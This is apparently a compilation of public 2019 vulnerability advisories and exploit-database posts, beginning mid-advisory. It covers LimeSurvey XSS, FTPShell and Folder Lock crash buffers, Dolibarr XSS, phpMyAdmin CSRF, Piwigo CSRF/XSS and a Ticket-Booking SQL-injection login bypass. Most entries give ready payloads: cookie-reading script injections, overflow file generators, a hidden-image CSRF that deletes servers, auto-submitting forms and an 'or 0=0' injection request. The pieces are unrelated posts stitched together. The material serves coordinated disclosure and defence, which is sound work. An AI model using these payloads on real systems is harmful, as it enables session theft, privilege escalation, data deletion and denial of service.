    2. perform unauthorized actions in the name of another logged-in user.

The vendor provides a patch which should be installed immediately.
Furthermore, a thorough security analysis is highly recommended as only a
short spot check has been performed and additional issues are to be expected.


Vulnerability overview/description:
-----------------------------------
1) Stored and reflected XSS vulnerabilities
LimeSurvey suffers from a stored and reflected cross-site scripting vulnerability,
which allows an attacker to execute JavaScript code with the permissions of the victim.
In this way it is possible to escalate privileges from a low-privileged account e.g.
to "SuperAdmin".


Proof of concept:
-----------------
1) Stored and reflected XSS vulnerabilities
Example 1 - Stored XSS (CVE-2019-16172):
The attacker needs the appropriate permissions in order to create new survey groups.
Then create a survey group with a JavaScript payload in the title, for example:

test<svg/onload=alert(document.cookie)>

When the survey group is being deleted, e.g. by an administrative user, the JavaScript
code will be executed as part of the "success" message.


Example 2 - Reflected XSS (CVE-2019-16173):
The following proof of concept prints the current CSRF token cookie which contains the
CSRF token. The parameter "surveyid" is not filtered properly:

http://$host/index.php/admin/survey?mandatory=1&sid=xxx&surveyid=xxx%22%3E%3Cimg%20
src=x%20onerror=%22alert(document.cookie)%22%3E&sa=listquestions&sort=question


If the URL schema is configured differently the following payload works:
http://$host/index.php?r=admin/survey&mandatory=1&sid=xxx&surveyid=
xxx"><img%20src=x%20onerror="alert(document.cookie)">&sa=listquestions&sort=question


Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been verified to exist in version 3.17.9 and the latest
version 3.17.13. It is assumed that older versions are affected as well.


Vendor contact timeline:
------------------------
2019-08-29: Contacting vendor through https://bugs.limesurvey.org/view.php?id=15204
2019-09-02: Fixes available:
            https://github.com/LimeSurvey/LimeSurvey/commit/32d6a5224327b246ee3a2a08500544e4f80f9a9a
            https://github.com/LimeSurvey/LimeSurvey/commit/f1c1ad2d24eb262363511fcca2e96ce737064006
2019-09-02: Release of LimeSurvey v3.17.14 which fixes the security issues
2019-09-03: Release of LimeSurvey v3.17.15 bug fix
2019-09-12: Coordinated release of security advisory


Solution:
---------
Update to version 3.17.15 or higher:
https://www.limesurvey.org/stable-release

The vendor provides a detailed list of changes here:
https://www.limesurvey.org/limesurvey-updates/2188-limesurvey-3-17-14-build-190902-released


Workaround:
-----------
No workaround available.


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF A. Kolbeck / @2019

#!/usr/bin/python


# Exploit Type  : DOS
# Exploit Title:  FTPShell client 6.74  -  Local Buffer Overflow (SEH)
# Vulnerable Software & version : FTPShell client 6.74
# Vendor Homepage: https://www.ftpshell.com/
# Software Link: https://www.ftpshell.com/downloadclient.htm
# Tested Windows : Windows Vista Ultimate SP2(32-bit), Windows 7
Professional SP1(32-bit)
# Exploit Author: Debashis Pal
# Timeline
# Vulnerability Discover Date: 03-Sep-2019
# Vulnerability Report to Vendor:03-Sep-2019,No responds
# Again email to Vendor:05-Sep-2019 ,No responds
# Public Disclose : 09-Sep-2019


# PoC
# 1. FTPShellclient6-74POC.txt from POC.py code, open in
notepad(FTPShellclient6-74POC.txt), copy contents
# 2. Open Core FTPShell client 6.74 & connect to a FTP server
(FTPShell client 6.74 i.e. FTP session need to active along with
username & password)
# 3. From FTPShell client 6.74 menu bar select the Tools-> Custom FTP Command
# 4. paste contents from notepad (into "Custom FTP Command" input field)
# 5. Application will crash and SEH overwritten



crash =  "\x41"  * 396 #Junk
crash += "\x43"  * 4   #nSEH
crash += "\x42" *  4   #SEH
crash += "\x44"  * 96 #More Junk


file="FTPShellclient6-74POC.txt"
generate=open(file, "w")
generate.write(crash)
generate.close


Attachment# Application crash and SEH overwritten.jpg


Thanks.

# Exploit Title: Folder Lock v7.7.9 Denial of Service Exploit
# Date: 12.09.2019
# Vendor Homepage:https://www.newsoftwares.net/folderlock/
# Software Link:  https://www.newsoftwares.net/download/folderlock7-en/folder-lock-en.exe
# Exploit Author: Achilles
# Tested Version: 7.7.9
# Tested on: Windows 7 x64


# 1.- Run python code :Folder_Lock.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open Folderlock and Click 'Enter Key'
# 4.- Paste the content of EVIL.txt into the Field: 'Serial Number and Registration Key'
# 5.- Click 'Submit' and you will see a crash.



#!/usr/bin/env python
buffer = "\x41" * 6000

try:
  f=open("Evil.txt","w")
  print "[+] Creating %s bytes evil payload.." %len(buffer)
  f.write(buffer)
  f.close()
  print "[+] File created!"
except:
  print "File cannot be created"

# Exploit Title: Dolibarr ERP/CRM 10.0.1 - User-Agent Http Header Cross Site Scripting
# Exploit Author: Metin Yunus Kandemir (kandemir)
# Vendor Homepage: https://www.dolibarr.org/
# Software Link: https://www.dolibarr.org/downloads
# Version: 10.0.1
# Category: Webapps
# Tested on: Xampp for Linux
# CVE: CVE-2019-16197
# Software Description : Dolibarr ERP & CRM is a modern and easy to use
software package to manage your business...
==================================================================

Description: In htdocs/societe/card.php in Dolibarr 10.0.1, the value of
the User-Agent HTTP header is copied into the HTML document as plain text
between tags, leading to XSS.

GET /dolibarr-10.0.1/htdocs/societe/card.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0ab<script>alert("XSS")</script>

=============================================
MGC ALERT 2019-003
- Original release date: June 13, 2019
- Last revised:  September 13, 2019
- Discovered by: Manuel Garcia Cardenas
- Severity: 4,3/10 (CVSS Base Score)
- CVE-ID: CVE-2019-12922
=============================================

I. VULNERABILITY
-------------------------
phpMyAdmin 4.9.0.1 - Cross-Site Request Forgery

II. BACKGROUND
-------------------------
phpMyAdmin is a free software tool written in PHP, intended to handle the
administration of MySQL over the Web. phpMyAdmin supports a wide range of
operations on MySQL and MariaDB.

III. DESCRIPTION
-------------------------
Has been detected a Cross-Site Request Forgery in phpMyAdmin, that allows
an attacker to trigger a CSRF attack against a phpMyAdmin user deleting any
server in the Setup page.

IV. PROOF OF CONCEPT
-------------------------
Exploit CSRF - Deleting main server

<p>Deleting Server 1</p>
<img src="
http://server/phpmyadmin/setup/index.php?page=servers&mode=remove&id=1"
style="display:none;" />

V. BUSINESS IMPACT
-------------------------
The attacker can easily create a fake hyperlink containing the request that
wants to execute on behalf the user,in this way making possible a CSRF
attack due to the wrong use of HTTP method.

VI. SYSTEMS AFFECTED
-------------------------
phpMyAdmin <= 4.9.0.1

VII. SOLUTION
-------------------------
Implement in each call the validation of the token variable, as already
done in other phpMyAdmin requests.

VIII. REFERENCES
-------------------------
https://www.phpmyadmin.net/

IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-------------------------
June 13, 2019 1: Initial release
September 13, 2019 2: Last revision

XI. DISCLOSURE TIMELINE
-------------------------
June 13, 2019 1: Vulnerability acquired by Manuel Garcia Cardenas
June 13, 2019 2: Send to vendor
July 16, 2019 3: New request to vendor without fix date
September 13, 2019 4: Sent to lists

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-------------------------
Manuel Garcia Cardenas
Pentester

=====[ Tempest Security Intelligence - ADV-03/2019 ]==========================

Piwigo - Version 2.9.5

Author: Rodolfo Tavares

Tempest Security Intelligence - Recife, Pernambuco - Brazil

=====[ Table of Contents]==================================================
 * Overview
 * Detailed description
 * Timeline of disclosure
 * Thanks & Acknowledgements
 * References

=====[ Vulnerability Information]=============================================
 * Class: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') [CWE-79] [CWE-79] Cross-Site Request Forgery (CSRF) [CWE-352]
 * CVSS:6.8.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
 * CVE-2019-13363, CVE-2019-13364

=====[ Overview]========================================================
 * System affected : Piwigo - Version 2.9.5
 * Software Version : Version 2.9.5 (other versions may also be affected).
 * Impact : Piwigo 2.9.5 is vulnerable to Cross-Site Request Forgery and XSS via /admin.php?page=notification_by_mail&mode=param or /admin.php?page=account_billing. An attacker can exploit this by injecting and persisting javascript code to coerce an admin user into performing unintended actions.

=====[ Detailed description]=================================================

The html codes below exploit vulnerabilities in the same way due to the fact that both forms do not contain CSRF tokens and are vulnerable to XSS attacks. Then an attacker can host these forms on their malicious host and trick an administrator into visiting your page. If successful, the javascript code will be persistently inserted into the administrative configuration pages.
 * [admin.php?page=notification_by_mail&mode=param]

<form action="http://domain.com/admin.php?page=notification_by_mail&mode=param" method="POST">

<input type="hidden" name="nbm_send_html_mail" value="xssaxssa<IMG """><SCRIPT>alert(document.domain)</SCRIPT>"" />

<input type="hidden" name="nbm_send_mail_as" value="xssaxssa<IMG """><SCRIPT>alert(document.domain)</SCRIPT>"" />

<input type="hidden" name="nbm_send_detailed_content" value="xssa" />

<input type="hidden" name="nbm_complementary_mail_content" value="xssa" />

<input type="hidden" name="nbm_send_recent_post_dates" value="xssa" />

<input type="hidden" name="param_submit" value="xssa" />
 * [admin.php?page=account_billing]

<form id="myForm" action="https://pocs.piwigo.com/admin.php?page=account_billing" method="POST">

<input type="hidden" name="vat_number" value="xssa" />

<input type="hidden" name="billing_name" value="xssa"><script>alert(1)</script>" />

<input type="hidden" name="company" value="xssb" />

<input type="hidden" name="billing_address" value="xssc" />

=====[ Timeline of disclosure]===============================================

26/Jun/2019 - Responsible disclosure was initiated with the vendor.

26/Jun/2019 - Piwigo confirmed the issue;

08/Jul/2019 - CVEs was assigned and reserved as CVE-2019-13364 CVE-2019-13363

09/Aug/2019 - The vendor fixed the vulnerability CSRF.

12/Aug/2019 - The vendor fixed the vulnerability XSS.

=====[ Thanks & Acknowledgements]========================================
 * Tempest Security Intelligence [4]

=====[ References ]=====================================================

[1][ https://cwe.mitre.org/data/definitions/352.html|https://cwe.mitre.org/data/definitions/352.html]

[2][ https://cwe.mitre.org/data/definitions/79.html|https://cwe.mitre.org/data/definitions/79.html]

[3][ https://github.com/Piwigo/Piwigo/issues/1055|https://github.com/Piwigo/Piwigo/issues/1055]

[4][ http://www.tempest.com.br|http://www.tempest.com.br/]

=====[ EOF ]===========================================================

# Exploit Title: Ticket-Booking 1.4 - Authentication Bypass
# Author: Cakes
# Discovery Date: 2019-09-14
# Vendor Homepage: https://github.com/ABHIJEET-MUNESHWAR/Ticket-Booking
# Software Link: https://github.com/ABHIJEET-MUNESHWAR/Ticket-Booking/archive/master.zip
# Tested Version: 1.4
# Tested on OS: CentOS 7
# CVE: N/A

# Description:
# Easy authentication bypass vulnerability on this ticket booking application 
# allowing the attacker to remove any previously booked seats

# Simply replay the below Burp request or use Curl (remember to change the Cookie Values)

POST /ticket/cancel.php HTTP/1.1
Host: Target
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://Target/ticket/login.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 50
Cookie: PHPSESSID=j9jrgserbga22a9q9u165uirh4; rental_property_manager=mq5iitk8ic80ffa8dcf28294d4
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1

userid='%20or%200%3d0%20#&password=123&save=signin